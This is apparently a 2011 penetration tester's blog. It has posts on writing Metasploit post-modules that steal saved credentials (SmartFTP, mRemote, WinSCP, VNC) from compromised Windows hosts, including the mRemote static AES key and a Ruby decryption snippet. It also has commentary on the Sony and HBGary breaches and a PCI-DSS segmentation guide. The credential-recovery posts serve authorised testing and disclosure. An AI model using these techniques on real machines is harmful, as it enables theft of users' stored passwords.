railgun.add_function('advapi32', 'CryptDecrypt', 'BOOL',[
['LPVOID', 'hKey', 'in'],
['LPVOID', 'hHash', 'in'],
['BOOL', 'Final', 'in'],
['DWORD', 'dwFlags', 'in'],
['PBLOB', 'pbData', 'inout'],
['PDWORD', 'pdwDataLen', 'inout']])

railgun.add_function('advapi32', 'CryptDestroyHash', 'BOOL',[
['LPVOID', 'hHash', 'in']])

railgun.add_function('advapi32', 'CryptDestroyKey', 'BOOL',[
['LPVOID', 'hKey', 'in']])

railgun.add_function('advapi32', 'CryptReleaseContext', 'BOOL',[
['LPVOID', 'hProv', 'in'],
['DWORD', 'dwFlags', 'in']])

There is a lot going on here. So we'll take it a little slow.
For those who don't know, Railgun is a part of Meterpreter that allows a user to hook Windows libraries and access their functions. In this case we are hooking Advapi32.dll to gain access to the Windows CryptoAPI (CAPI) functions.

CryptAcquireContextW is the Unicode version of the AcquireContext function. This creates the cryptographic context we will be working in. The first parameter is a pointer to the provider object. The provider object is, in and of itself, a pointer to a data structure that will be initialised by this function. So we pass it a pointer to a DWORD for the pointer to be placed in, and set it as an out parameter so the function will return the pointer information to us. We are not using the container object in this case, so we pass it nil. We then tell it which provider to use; in this case it is the Microsoft Enhanced Cryptographic Provider, passed as a pointer to a string. We then pass it a value to tell it what type of provider to use. WinCrypt.h normally provides constants for this, but since we don't have access to those constants we pass the raw numerical value instead; in this case the value for the PROV_RSA_FULL provider type. Finally we pass it the appropriate flags. Like the provider type, this expects a constant, so we pass a numerical value: CRYPT_VERIFYCONTEXT (0xF0000000). For more details on the available flags I suggest you look at the MSDN documentation.

CryptCreateHash creates a hash object for us to use, in much the same way that AcquireContext created a provider object. We pass it the provider object as the first parameter, remembering that this object is a pointer to an abstracted in-memory data structure. Then we pass it the algorithm ID for the kind of hash algorithm we will be using; again, this typically expects a constant we don't have, so we pass a numerical value. If the hashing algorithm expected a key we would pass a key object here; since we are using MD5 we pass a 0 to tell it we are not using a key. We pass a 0 for the flags. Finally we pass it a pointer to a place in memory for it to store the hash object. Just like the provider object, this is actually a pointer to a memory structure initialised by this function.

CryptHashData is what will actually create the hash for us and put it in the hash object. The first thing we do is pass it our hash object. We then pass it the data to be hashed; in this case we are hashing the string "SmartFTP". We then pass it the data length of 16 (the string goes in as wide characters, so 8 characters take 16 bytes), and again we pass no flags with a 0. This is the first step in deriving our encryption key.

CryptDeriveKey takes our hash and derives an encryption key from it. We pass it our provider object, an integer value for our encryption algorithm (RC4), the hash object, our flags, and a pointer to a key object. This key object works the same way as the hash and provider objects before it. The function derives an RC4 key for us and puts it in the memory structure pointed to by our key object.

CryptDecrypt is where the magic finally happens. We pass it our key object as the first parameter. If the data were to be decrypted and hashed at the same time we would pass a hash object; since we do not want to hash the results we pass a 0. The next parameter indicates whether this is the final section to be decrypted; we pass it true. We pass no flags, then a pointer to the data to be decrypted, and finally the length of that data.

The remaining three functions are essentially just garbage collection. They close out the memory structures we initialised along the way.

Some of the parameters in these function calls are still not set up in the most ideal fashion. One of the big tricks to remember is that, in the end, a pointer is just a number. So even though Ruby has no pointers, just treat them as numbers and pass them back as LPVOIDs. I will be smoothing out any wrinkles in these function defs soon, and adding the other CAPI functions that I didn't need for this particular module.

Once the decryption is complete, the module displays the results back to the console. It also reports the data to the backend database, which means the credentials will be stored for the target machines. If you use Metasploit Pro (which, if you are a professional Penetration Tester, I cannot recommend enough), this is especially useful. If the remote machines are in your project scope, those credentials will show up in the host information and can be used for further module usage.

So there you have it. I hope you find this detailed breakdown useful and/or informative. Stay tuned for further updates and developments. I am continuing on my goal of making it into the Metasploit.com Top contributors list, but I suspect I still have a ways to go.

Saturday 18 June 2011

Windows Cryptography with Metasploit and SmartFTP Password Recovery

I have submitted two new additions to Metasploit tonight. The first is a series of function definitions for Railgun. These functions are some of the core Windows CryptoAPI functions. It is not a complete list yet; I only added the ones I needed to complete the other piece I'll tell you about in a minute. I will be working over the next week to get all of the other CAPI functions defined within Metasploit Railgun. In addition to that, I will try to write a library that will serve as an abstraction layer for these function calls. This library will wrap the Windows CAPI functions as well as serve up a lot of the same constants provided by the WinCrypt.h header file. I hope that this will make it easier for other module writers to make use of the Windows CryptoAPI whenever they may need it in a post module.

The second bit of business is what actually spawned this work. I have submitted a module for Extracting/Recovering saved Passwords from the SmartFTP Client. Like the other modules I have submitted, it finds the passwords saved by users, decrypts them and reports them back to the backend database as well as to the display screen.

I want to take a moment to especially thank jduck and chao-mu who helped me talk through some things while I was working on this. As always the support of the community in the #metasploit IRC channel is amazing.

Thursday 16 June 2011

Metasploit Activities

Well, I know I have been pretty quiet lately, so I thought I'd provide an update. I am very tempted to try to stake a claim on one of the Metasploit bounties, but I don't think I'm quite up to that challenge yet. Instead I will continue to work on some of my other Metasploit projects:


  1. Build Railgun support for the Windows Crypto API(CAPI)
  2. Finish my SmartFTP password recovery module
  3. Build Meterpreter NetStat support for Windows
  4. Some other things that have not solidified yet.
I hope to get those first three items completely done in the next month or so. I want to have them completed and committed before Black Hat. It looks like I will be attending Black Hat courtesy of Rapid7 this year, but only for the briefings. I unfortunately do not have the means at my disposal to stay for DefCon this year. I look forward to meeting some people in person.

Thursday 2 June 2011

Stealing Passwords from mRemote

If you don't know, mRemote is a tabbed remote connection manager for Windows. It can store and manage a number of different connection types, chief among them RDP, VNC, and SSH. It is a popular tool among IT support people who have to remote into a lot of machines.

When you save connections in mRemote, it writes all of that data into an XML file in your local AppData folder. The passwords are saved in an encrypted format; however, this is trivial to circumvent. The passwords are encrypted with AES-128-CBC (Rijndael), the IV is prepended to the ciphertext, and the whole thing is base64 encoded for output into the XML. The encryption key used is the MD5 hash of the string "mR3m". So to decrypt these passwords we follow a simple process:

example password:  28kQ15DF4kdW34Mx2+fh+NWZODNSoSPek7ug+ILvyPE=

  1. Get the md5 hash of mR3m and convert it into byte values: \xc8\xa3\x9d\xe2\xa5\x47\x66\xa0\xda\x87\x5f\x79\xaa\xf1\xaa\x8c
  2. base64 decode the saved password data
  3. Take the first 16 bytes of the decoded data and set that as your initialization vector (IV)
  4. Run AES-128-CBC decryption, feeding it your ciphertext (the remaining bytes from the decoded data), your IV (those first 16 bytes), and your key (\xc8\xa3\x9d\xe2\xa5\x47\x66\xa0\xda\x87\x5f\x79\xaa\xf1\xaa\x8c)
  5. You should get a decrypted password of: password1
Simple and easy, you are now ready to decrypt all of those delicious RDP,VNC, and SSH passwords. To make it all that much easier I have written a new Metasploit POST module that will find the XML files on a compromised machine and decrypt those passwords for you. I just submitted it to Redmine so it hasn't been added yet, but keep your eyes peeled. I suspect it will be in there soon.
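The steps above can be sketched in plain Ruby outside of Metasploit. One assumption in this sketch: the final block uses standard PKCS#7 padding (the post's example blob is shown in a comment rather than asserted, since details may vary by mRemote version):

```ruby
require 'openssl'
require 'digest'

# Decrypt an mRemote saved password: the base64 blob is IV (16 bytes)
# followed by ciphertext, AES-128-CBC, key = raw MD5 digest of "mR3m".
def decrypt_mremote(blob)
  data = blob.unpack1("m")              # base64 decode
  iv, ct = data[0, 16], data[16..-1]    # split off the prepended IV
  aes = OpenSSL::Cipher.new("AES-128-CBC")
  aes.decrypt
  aes.key = Digest::MD5.digest("mR3m")  # static key derived from "mR3m"
  aes.iv = iv
  aes.update(ct) + aes.final            # assumes PKCS#7 padding
end

# e.g. decrypt_mremote("28kQ15DF4kdW34Mx2+fh+NWZODNSoSPek7ug+ILvyPE=")
```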

Sunday 1 May 2011

Metasploit Meterpreter Registry OpenKey and VNC PW Module

As you probably already know, I've been doing some work with Metasploit post modules. This recent work has focused heavily on registry functions. While doing this work I noticed a disturbing behaviour: when Meterpreter checks to see if a key exists, it calls RegCreateKey instead of RegOpenKey. RegCreateKey will attempt to create any and all keys in the supplied path that do not already exist. RegOpenKey, however, will not create the key if it doesn't already exist.

In Metasploit the registry.rb 'client-side' function is set up as a wrapper to the create_key function. Similarly the registry.c code for Meterpreter itself is set up this way. Calls to the OpenKey function were just passed on to the create_key function. I have now submitted a patch to correct this behaviour. The registry.rb function now sends a call via the meterpreter stdapi to the request_registry_open_key function. The request_registry_open_key function will appropriately call RegOpenKey instead. If/when this patch is accepted by the Metasploit team, it will make the Registry functions of Meterpreter much less invasive/noisy.


I have also gone ahead and submitted a patch for the enum_vnc_pw post module. The module as it currently stands will check the HKEY_CURRENT_USER keys for user-mode VNC passwords. However, this will only work if Meterpreter is running under the permissions of the user who is running the VNC server. I have added behaviour that will try to enumerate all users with SIDs in HKEY_USERS and then check each one that it can access to see if it has stored VNC passwords. The get_reg function also had to be re-written to deal with possible permissions issues if Meterpreter does not have rights to access each user's registry. The best way to run this module will, of course, be under SYSTEM privileges, as it will then have access to every user. This will hopefully make the enum_vnc_pw module more effective at gathering its data.

Friday 29 April 2011

Sony PSN Hack: Leave GeoHot out of it

So I wandered by GeoHot's latest place of residence today. I thought his posting was very well written and very nicely defined his stance. His work on opening up homebrew software on the PS3 was not aimed at enabling piracy, and he does not support or condone the PSN hack in any way. Despite this, he is flooded by comments blaming him either directly or indirectly for the hack. The level of ignorance in this matter is astounding. After two decades on the internet, you'd think I would not be surprised at this point, but I still am. I suppose I just can't shake this pesky hope in humanity.

I want to lay this out in terms that, hopefully, even the dumbest internet denizen can understand:


  1. George Hotz, Fail0verflow and any other homebrewers did not support this attack. Their work was aimed at restoring functionality that was stripped away from devices they had bought specifically for that functionality. I wonder how many people would have bought a 360 instead of a PS3 if Sony hadn't advertised the OtherOS functionality. It was certainly one of the reasons I bought my first PS3. George Hotz and these others did not perpetrate this attack.
  2. There is no evidence that this attack even had anything to do with the homebrew console debate. Consider the following. 
  • If this was about revenge or embarrassing Sony, the attack would need to be public as quickly as possible to try and prevent Sony from sweeping it under the rug. 
  • Nobody has come forward to take responsibility for the breach. Instead, the information inevitably leaked out from Sony as they shut down their own service to get a handle on the incident.
  • The breach targeted customer data, including PII (Personally Identifiable Information) and potentially credit card data. These are high-value targets monetarily.
  • The above-mentioned lack of disclosure/credit-taking is more indicative of someone looking to steal this data and sell it for profit.
  • Some will try to argue that the attacker could have expected Sony to disclose the breach, but that argument has two huge gaping holes. First, if Sony's security was poor enough to let the breach happen in the first place, why should there be any expectation that they had proper safeguards in place to alert them to the breach? They obviously believed they had no reason to ever expect an attack like this. Secondly, why assume Sony would even admit to the breach? Plenty of companies suffer these kinds of breaches and do not report them. It happens a lot more than you might think.

The point is that there is no evidence to support the idea that this has anything to do with the homebrew console debate. In fact, the little bit of evidence we have so far points to a common data theft. To all of you people who are jumping on the Anonymous angle or any other media buzz right now, do some reading. These sorts of breaches happen all the time. This breach was essentially inevitable as long as Sony failed to correct the security flaws in their systems. If you want somebody to blame, you have two parties to go after: Sony, and the people who actually stole your data. Plenty of blame to go around; you can leave GeoHot out of it.

Wednesday 27 April 2011

Stealing WinSCP Saved passwords

WinSCP is a popular SCP and SFTP client for Windows. Users of this tool have the option of storing 'sessions' along with saved passwords. There is an option within WinSCP to encrypt these passwords with a 'master password', in which case the stored passwords will be AES-256 encrypted. However, this option is NOT turned on by default. There are two ways these sessions can be stored by WinSCP. The default behaviour is to save them in the registry, under HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions. The other option is to store them in an INI file, which will be located in the WinSCP install path.

When no master password is set, it is trivial to reverse the 'encryption' used on the stored passwords. It is a simple series of bitwise operations, using the username concatenated with the host name as a sort of pseudo-key. To simplify the process of stealing these passwords I have created a Metasploit post module, /modules/post/windows/gather/enum-winscp_pwds.rb, which was committed in the latest revision.
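The post doesn't spell out the exact operations (see the module source for WinSCP's real algorithm). As a purely illustrative toy example of this general style of obfuscation, where a pseudo-key derived from username + hostname is applied bytewise across the data:

```ruby
# Toy illustration only -- NOT WinSCP's actual scheme. It shows the general
# pattern: XOR each data byte against a repeating pseudo-key built from the
# username concatenated with the hostname.
def xor_with_pseudokey(data, username, hostname)
  key = (username + hostname).bytes
  data.bytes.each_with_index.map { |b, i| b ^ key[i % key.size] }.pack("C*")
end

# XOR is symmetric, so applying the function twice recovers the original.
```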

Once again, I am pleased to be contributing to the Metasploit project. I want to take a moment to especially thank egyp7, hdm, and jduck for their help and support. They put up with a lot of dumb questions while I was working on this module; it is only the third one I have created and the second to get committed. The Metasploit team is an amazing group of people to work with. They freely share their knowledge and experience and make Metasploit truly a community-driven project, instead of just another piece of OSS. I look forward to continuing to contribute to the Metasploit project.

Tuesday 12 April 2011

Updated Metasploit wishlist

A little while ago I posted my Metasploit wishlist. I have pulled a new, updated copy of this list and added a Category field to help sort through it a little more easily. I'll be spending some of my spare time going through this list and picking out things to port over. My first go-around was a success, and my first ported module:
http://metasploit.com/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid

was committed. It may have been a little sloppy, but I look forward to getting better as I go on. Mark my words, I'm going to get my name on that front page list.

Here's the new list

Tuesday 15 February 2011

Of Hacks, Leaks, and Legal Battles : Is anyone really winning?

In recent days we have seen what seems like an escalation in the battle for the Information Age. These events are far from new, but they have reached a fever pitch. I suppose it probably started with the whole WikiLeaks-Bradley Manning affair, which sparked quite a fierce fight both off and on the internet. A fierce debate with highly polarized sides sprang up around the issue of WikiLeaks.

Into that fray jumped Anonymous. They took their own unique sense of purpose and went after anyone whom they felt had wronged WikiLeaks. This included attacks on PayPal, MasterCard and others, taking time off from their busy schedule of attacking PirateBay opponents around the world. These sorts of things are not all too uncommon, especially when dealing with Anon, and they have made the news in the past. What was different this time was that there was already a frenzy around the WikiLeaks issue.

Soon a new subset appeared. This group would have us believe that they are independently operating patriotic hackers, such as th3j35t3r; I have my doubts as to how independent these folks really are. These people went after Anonymous, WikiLeaks and anyone else supporting them. A sort of mini-cyberwar started. What I find interesting is that the US Department of Justice launched an immediate investigation into Anonymous to try to make arrests over their DoS attacks. Yet the sophisticated DoS attack that was carried out against WikiLeaks was just as illegal, and the government remains silent on the subject.

The fighting and debating raged on around WikiLeaks. Many things occurred during the next several months that I don't feel the need to recap, so let's fast-forward to the past few weeks. Aaron Barr, CEO of HBGary Federal, announced that he had 'infiltrated' Anonymous and discerned the true identities of the Anon leadership. (This statement alone seems to show a misunderstanding of the true nature of Anonymous, but look at some of my earlier posts for my theories on this subject.) Aaron Barr apparently sought to use this information to leverage himself and his company into a bit of the spotlight. Allegedly, Barr was going to sell this information to the FBI.

In response, a few members of Anonymous launched an assault on HBGary Federal during the Super Bowl. In short order they had compromised systems inside HBGary Federal, taken control of rootkit.com, and seized Aaron Barr's Twitter account along with the social networking accounts of several other folks at HBGary. They stole a large number of emails from the company, and allegedly wiped out HBGary's backups.

The initial assault left HBGary reeling and embarrassed like a kid who gets pantsed at the bus stop. It got worse from there, though. Amongst the stolen emails was a document supposedly composed by HBGary Federal and Palantir. The target audience was allegedly Bank of America. The subject matter? How to destroy WikiLeaks. The document details disinformation campaigns, smear attacks against pro-WikiLeaks journalists, denial-of-service attacks against WikiLeaks infrastructure, and attempts to infiltrate the group to discover the identities of document submitters. You can see a copy of the document here. BofA and Palantir quickly began damage control, disavowing any knowledge of the document or its creation. Additional documentation has since surfaced to cast doubt on some of these claims.

The lesson here so far? Even a security firm like HBGary can get thoroughly spanked on the internet by not taking threats seriously. The damage to the company from these leaks is yet to be seen, but other companies are already cutting ties to try to protect themselves. In this case the leak has already proven to be an effective weapon against a powerful company.



Meanwhile, another little drama was unfolding: the Gregory Evans/Ligatt Security drama. Gregory Evans has been accused of being a charlatan for a while. He made claims of being the 'world's no. 1 hacker', a ridiculous and pompous proclamation if ever I've heard one. He released a book on how to become the world's no. 1 hacker, a book which was quickly accused of large-scale plagiarism. Evans denied these accusations, and at one point claimed that he paid any third-party content writers for their material. I do not know about the vast majority of this claim. However, Chris Gates, aka carnal0wnage, was one of the authors whose material appeared in the book. Gates denied ever receiving any payment or giving Evans permission to use his material in the book. The material is so obviously ripped off that Evans even used the same screenshots, which include Chris Gates' name in the login prompts.

Enough about the gory details though. Suffice it to say, the Evans/Ligatt drama continued on. Evans fought back in the only way he seems to know how: he filed lawsuits. Quite a few lawsuits, actually. He tried suing anyone and everyone he could who had ever said anything bad about him on the internet. Most of these lawsuits have failed completely, but that didn't stop Evans. Recently, on Gregory Evans' birthday, his email and Twitter accounts were hacked. All of his email was leaked into a torrent on the internet and distributed. Since the leak of his email, one embarrassing piece of evidence after another has surfaced from the spool. Many of these documents were reposted to the LigattLeaks blog, which was originally hosted on WordPress. Evans and Ligatt sent take-down demands to WordPress and the registrar for LigattLeaks.org. WordPress capitulated in the face of any possible legal ramifications, whether there was a solid legal basis or not.

LigattLeaks has since moved on to a site at http://ligattleaks.blogs.ru and continues to post with impunity. Since LigattLeaks themselves claim they do not possess the mail spool and are only reposting things found on pastebin, they seem to be under no legal liability. The actual consequences of these leaks for Evans or Ligatt? Aside from a lot of embarrassment and a local news story, there has yet to be any serious consequence. However, Evans' litigious assaults on the infosec community seem to have had no real effect either. So right now I'm calling this one a draw.

Now let's move on to the Sony PS3 case. The folks over at Fail0verflow got their hands on the keys used to sign software for the PS3. Well-known hardware hacker GeoHot then built on this and created a modkit to allow homebrew software to run on the PS3. Sony claims that this will only serve to enable piracy on their game consoles. They filed suit against GeoHot, subpoenaed all of his computer equipment, and issued orders for his instructional videos to be stripped from the internet. In response, the instructions, examples, and encryption keys were spread across the internet. Before the case against GeoHot has even begun, Sony is now trying to use the legal system to gain information on every person who viewed or commented on GeoHot's video on YouTube. They are also seeking legal action against anyone who posts the encryption keys. This drama is still under way, but I'm going to go ahead and call it now: Sony will lose, no matter what the trial outcome.

There is already a huge public outcry against Sony over this action. They may have already caused themselves irreparable brand damage. They have increased the actual awareness of these hacks. And there is no way that they can successfully suppress the information once it has begun disseminating through the internet; they are trying to stuff the proverbial genie back in the bottle. One has to wonder why they are doing this. They will not be able to recoup any significant losses, and they won't be able to suppress the information. They are trying to lay down intimidation tactics, and those tactics are of course having the opposite effect. One has to wonder if Anonymous or another group won't turn its attention towards the Sony mega-corporation. It would be very interesting to see a battle between Anonymous and such a huge company.


These are three examples of folks in the corporate world trying to control and shape the internet for their own benefit. All of them are failing miserably, and they are all starting to pay a heavy price for it.

Friday 11 February 2011

PCI-DSS : You gotta Keep Em Separated!

I turn to the Offspring for a bit of lyrical wisdom in terms of my latest PCI-DSS ramblings. All humour aside, please pay attention to what I am about to tell you. I cannot stress this enough:
The number one thing you should focus on for PCI-DSS is Network Segmentation. If you do not employ proper network segmentation, your PCI compliance efforts will be painful at the best, and a disaster at the worst.

Maybe your company already handles HIPAA/HITECH or SOX. Maybe you have had some other security initiatives running for a while. That's great. PCI-DSS is a very different game, and if you don't segment your network, you will drown in work.

You may have other confidentiality requirements in place. You may be tempted to place HIPAA data or sensitive financial data in the same network segments as your PCI data. I am telling you now: resist that temptation. It may seem like a perfectly reasonable approach, but it should be avoided if possible.
With proper segmentation of your networks, you give yourself the opportunity to approach your goals in a phased, risk-based manner. This will help maximize your efficiency when trying to achieve these goals, and will also ensure that you are adding the most possible security benefit at each step of the process.

Completing this network segmentation depends upon some sort of systems inventory process. You need to know exactly what systems are in your environment, how they interact, and what their roles are. Without this, you will fail to segment your network properly and will never be able to truly add meaningful security as a whole.
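To make that concrete, here is a minimal sketch of what such an inventory might capture. This is just one possible in-memory model; all host names, roles, and zone labels here are hypothetical:

```python
from dataclasses import dataclass, field

# Hypothetical minimal inventory record: what the host is, what it
# talks to, and which data classifications it touches.
@dataclass
class Host:
    name: str
    role: str                                        # e.g. "web", "db", "desktop"
    zone: str                                        # segmentation zone
    data_classes: set = field(default_factory=set)   # e.g. {"PCI"}
    talks_to: set = field(default_factory=set)       # names of peer hosts

inventory = [
    Host("web01", "web", "PCI", {"PCI"}, {"app01"}),
    Host("hr-db01", "db", "PII", {"PII"}, set()),
    Host("desk-105", "desktop", "Desktop", set(), {"web01"}),
]

# Knowing who talks to whom tells you exactly where segmentation
# will break things, before you start moving firewalls around.
pci_hosts = {h.name for h in inventory if "PCI" in h.data_classes}
crossers = [h.name for h in inventory
            if h.name not in pci_hosts and h.talks_to & pci_hosts]
print(crossers)  # hosts outside the PCI zone that reach into it
```

Even a spreadsheet works for this; the point is that the interactions between hosts have to be recorded, not just the hosts themselves.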
Let's say that you have three primary information security concerns: PCI, HIPAA, and SOX. This means you are concerned with 4 primary data classifications:
1. PCI Data (credit card numbers, expiration dates, CVVs, etc.)
2. PII/HIPAA Data (any personally identifiable information and healthcare data)
3. Financial Reporting Data
4. Everything Else
Let's talk about a perfect scenario: you are a fairly sizable company, and you have a solid budget for the security initiative you are undertaking. That being said, we will go ahead and break down #4 into some additional categories that will help with your overall security posture:

1. Critical Infrastructure (servers and network devices responsible for core business applications and services, e.g. email, telephony, primary line-of-business applications)
2. Desktop Ranges (where all of your users should be sitting)
3. QA/DEV Environments (even if you are not doing any in-house development, you should have some QA environments to test things like configuration changes; keeping these separate is important for a number of reasons we will get into later)
4. Non-Critical Systems (everything else)
So now we essentially have 7 distinct areas mapped out. Let's talk a bit more about each of these areas.

PCI Data – This area will include any device that stores, processes, or transmits credit card data as defined by the PCI Council. In our scenario, this is the area that is going to be subject to some of the most stringent security requirements. This area should be strongly separated from all of the other regions, permitting as little contact between these networks and any others as possible. The rule of thumb should be Deny by Default. These hosts will all be subjected to regular vulnerability scanning and penetration testing efforts. Any applications hosted in this environment should be subject to source code review and application security assessments.

Within the PCI environment, the hosts should be further separated where possible. Any external (Internet-facing) presentation layer should be strongly segmented away from the application and data layers. This is to mitigate the chance that your presentation layer will be used as an entry vector deeper into the environment.
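One way to picture Deny by Default across this tiering: a flow is permitted only if it appears on an explicit allow list, and everything else is dropped. A minimal sketch, where the zone names and ports are hypothetical examples of a presentation/application/data split:

```python
# Hypothetical deny-by-default policy: only explicitly allowed
# (source_zone, dest_zone, port) tuples pass; everything else is denied.
ALLOW = {
    ("Internet", "PCI-Presentation", 443),   # public HTTPS front end
    ("PCI-Presentation", "PCI-App", 8443),   # presentation -> app tier
    ("PCI-App", "PCI-Data", 5432),           # app tier -> database
}

def permitted(src: str, dst: str, port: int) -> bool:
    """Deny by default: a flow is allowed only if explicitly listed."""
    return (src, dst, port) in ALLOW

print(permitted("Internet", "PCI-Presentation", 443))  # True
print(permitted("Internet", "PCI-Data", 5432))         # False: no direct path to data
```

Note that the Internet never gets a direct path to the data tier; an attacker has to traverse each tier in turn, and each hop is another choke point you control.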

PII/HIPAA Data – This area is going to be a concern from a regulatory standpoint as well. However, HIPAA's guidelines on security requirements are nowhere near as stringent as those set forth by PCI. Your company should create a set of standards and ensure that they are applied to all hosts in this environment. These standards should cover topics like access control, encryption (in transport and at rest), approved applications, approved services, etc. The environment should be audited regularly to ensure that these standards are being upheld. Regular vulnerability scans should be a priority in this environment as well. Code reviews, application security assessments, and penetration tests should be a goal, but should take a lower priority than completing these same tasks within the PCI environment.

It is possibly even more important that the external-facing presentation layer be segmented off from the rest of the environment here. This is because any Internet-facing hosts are in scope for PCI external vulnerability scanning and penetration testing. If you do not segment the rest of the PII zone off, you can quickly find the entire zone considered in scope for PCI as well. That would mean you are required to enforce the same standards on this environment that you do in the PCI zone. This may not seem like a bad thing, but the workload can get out of hand quickly.

Financial Reporting Data – This is the zone where your SOX standards come into play. SOX is, in my experience, one of the most vague sets of standards out there. It mandates that financial reporting data be secured to maintain accuracy and integrity. The big concern in this zone can be summed up in a word: accountability. If we apply the CIA model (Confidentiality, Integrity, Availability) to this zone, we will see that Integrity is our number one concern, followed by Confidentiality, with Availability coming in a very distant third.
What you should focus on:
·         User Account Management
·         Access Control
·         Auditing/Activity Monitoring
The focus here is going to be a lot more process oriented than technical. Ensure that user accounts are set up properly on all systems, with only the access they need. Make sure there is no sharing of accounts, or use of generic accounts. Make sure that activity on all Financial Reporting systems is logged for auditing to maintain maximum accountability.
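To illustrate the accountability angle, here is a rough sketch of tying every action on a reporting system back to a named, non-shared account via an audit log. The function and field names are hypothetical, not any particular product's API:

```python
import functools
import logging

logging.basicConfig(level=logging.INFO, format="%(asctime)s %(message)s")
audit_log = logging.getLogger("audit")

# Hypothetical sketch: wrap sensitive operations so that who did what,
# and to which record, is logged before the action executes.
def audited(action):
    def wrap(fn):
        @functools.wraps(fn)
        def inner(user, *args, **kwargs):
            audit_log.info("user=%s action=%s args=%s", user, action, args)
            return fn(user, *args, **kwargs)
        return inner
    return wrap

@audited("post_journal_entry")
def post_journal_entry(user, entry_id, amount):
    # The record itself also carries the acting user, so the data
    # and the audit trail can be cross-checked against each other.
    return {"entry": entry_id, "amount": amount, "posted_by": user}

result = post_journal_entry("jsmith", 1042, 250.00)
```

The mechanics matter less than the principle: if "jsmith" is a real person and not a shared login, every journal entry is attributable, which is exactly the accountability SOX auditors are after.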
Regular audits should be done on this zone to ensure all standards and policies are being properly observed within it. Regular vulnerability scanning in this zone may be a good idea, but is not a must. If time and resources allow, source code review, application security assessments, and penetration tests should be performed to help validate the security mechanisms in place.
Like the other zones, any Internet facing Presentation Layer should be segmented from the rest of the zone as much as possible. Remember, all Internet facing hosts are subject to PCI.
Critical Infrastructure – The separation of this Zone is probably going to be less dramatic than with the ones we’ve just discussed. It is still a good idea to tightly control the flow of data in and out of this zone though. Regular Vulnerability scans should be performed in this Zone, but only after the above Zones have reached a point in their maturity where the Vulnerability Management efforts are running smoothly. That will allow you to have time for working with System Admins on remediating any findings. Availability may be a much larger concern in this Zone than in some of the others. This zone represents the core of your operations and should be treated carefully. In addition to the Vulnerability Scans, Penetration Testing efforts are a very good idea in this zone.
Do I need to say it again? Any Presentation Layer facing the Internet needs to be additionally segmented. I think you’ve probably got this idea down pat by now.

Desktop Ranges – Desktop networks are a tricky subject. They should be segregated out as much as possible for a couple of reasons. One is that you don't want a compromise of the outer systems to be able to get into the desktop networks and run amok. Secondly, you don't want the opposite to happen. Desktop ranges are honestly going to be the most likely entry vector into your network. A lot of attacks on companies start by tricking users into visiting a web page, or opening a file, that they shouldn't. If your desktop users have unfettered access, then it is game over.
I cannot stress enough the importance of applying standards here. Some chief things to think about when looking at standards for your desktop networks:
1.       Approved Software – Make sure you know what software is safe to run on machines, and don’t allow any other software to be installed without authorization.
2.       Update management – Make sure that all approved software can be updated in a controlled and uniform manner.
3.       File Shares – In my experience as a penetration tester, this is where you see the most heinous failures. Users often open up shares on their computers to trade files back and forth. The problem is that they do not necessarily know how to secure those shares properly.
4.       Running Services – If your desktops are all running Windows Messenger or Chargen, you better have a good reason for it. Aside from these obvious concerns, also think about things like Remote Registry. Remote Registry allows for a lot of troubleshooting and remote administration, but it also opens potential security risks. Weigh the benefits and risks accordingly for your environment.
5.       Anti-virus – I don’t think I need to explain this.
6.       Account Policies – Password complexity, expiration, and lockout policies. Also policies on shared or generic accounts. This also applies to the Local Administrator account. If all of your Desktops run with the same local Admin password, it will only take one Desktop being compromised for this entire Zone to be in danger.
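On the shared local Administrator point, one quick sanity check is to compare the local admin password hashes across your desktops: any hash that appears on more than one machine means one compromised desktop yields admin on all of them. A rough sketch, where the hash values are illustrative placeholders rather than real dumps:

```python
from collections import Counter

# Hypothetical data: local Administrator password hashes gathered from
# each desktop (values are illustrative placeholders, not real hashes).
local_admin_hashes = {
    "desk-101": "hashvalue-aa11",
    "desk-102": "hashvalue-aa11",   # same hash as desk-101: same password
    "desk-103": "hashvalue-bb22",
}

# Any hash shared by more than one machine is a lateral-movement risk:
# compromising one desktop gives local admin on every machine sharing it.
counts = Counter(local_admin_hashes.values())
reused = {h for h, n in counts.items() if n > 1}
at_risk = sorted(m for m, h in local_admin_hashes.items() if h in reused)
print(at_risk)  # machines sharing a local admin password
```

Randomizing the local Administrator password per machine (and vaulting the results) closes this hole off entirely.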
Vulnerability scanning on desktop ranges is not an easy decision point. There are benefits and risks associated with this activity. As previously stated, the desktops are going to be one of your most likely entry vectors for an attack. However, vulnerability scans can be potentially disruptive, and if you are doing authenticated scans, you may get back a lot more results than you are going to want to look at. If you decide to do authenticated vulnerability scans, it will be very important that you have items 1 and 2 from above firmly in place first.
There really shouldn’t be anything to do in terms of Source Code Review or AppSec Assessments here. Penetration Test efforts will almost certainly have a field day in this zone. If there is anything directly Internet facing in this zone, you have done something horribly, horribly wrong!

Non-Critical Infrastructure – Let’s jump to the ‘Everything Else’ group for a second. This is going to be all of your non-critical systems. These are the things that don’t handle sensitive data and are not required for day-to-day operations to succeed. The separation of this zone should be defined by the separation and controls placed around all of the other zones. No additional work should be required for separating these hosts out. All of your security activities such as Vulnerability Scanning, Penetration Testing, AppSec Assessments, and Code Reviews should be long term goals. Start working on these only after everything is running smoothly in all of the other zones. This is the point at which you’re just cleaning up the rest of the garbage in your Enterprise. If you get to the point where you are cleaning up this zone, you are well on your way to the sustainment phase of your overall Security Initiative.
QA/DEV Systems – QA and DEV environments are a quagmire. The best advice I can give you is as follows.
·         Separate QA and DEV out from the rest of your environment as much as possible.
·         Try to avoid any contact between QA/DEV and the internet.
·         Do not ever allow real production data to reside within a QA or Development Zone.
·         Do NOT Vulnerability Scan your QA and Dev environments. These zones will be extremely volatile, and will be in a  constant state of flux. You will be bogged down chasing vulnerabilities that disappear and reappear at random. If you have segregated these zones appropriately, there is nothing to be gained from Penetration Testing or Vulnerability Scanning in this Zone. Save yourself the headache.
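On the "no real production data" point, one way to sanity-check a QA datastore is to scan it for digit strings that pass the Luhn checksum, which plausibly-real card numbers will. A minimal sketch of that check:

```python
def luhn_valid(number: str) -> bool:
    """Return True if the digit string passes the Luhn checksum,
    a quick first-pass test for plausibly-real card numbers."""
    digits = [int(d) for d in number if d.isdigit()]
    if len(digits) < 13:          # PANs are 13-19 digits
        return False
    total = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:            # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0

# "4111111111111111" is a well-known test PAN that passes Luhn.
print(luhn_valid("4111111111111111"))  # True
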